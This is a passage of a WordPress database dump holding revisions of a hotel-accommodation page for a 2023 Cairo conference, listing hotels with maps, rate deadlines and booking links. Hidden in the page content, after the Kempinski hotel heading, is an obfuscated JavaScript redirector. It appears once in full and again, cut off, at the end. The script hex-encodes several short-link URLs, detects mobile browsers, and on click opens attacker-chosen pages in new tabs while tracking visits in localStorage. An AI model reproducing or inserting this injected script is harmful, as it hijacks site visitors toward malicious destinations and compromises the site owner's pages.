Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-15 16:46:59','2023-08-15 16:46:59','',2685,'https://gsw2023.com/?p=5201',0,'revision','',0),
(5202,1,'2023-08-15 16:49:04','2023-08-15 16:49:04','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 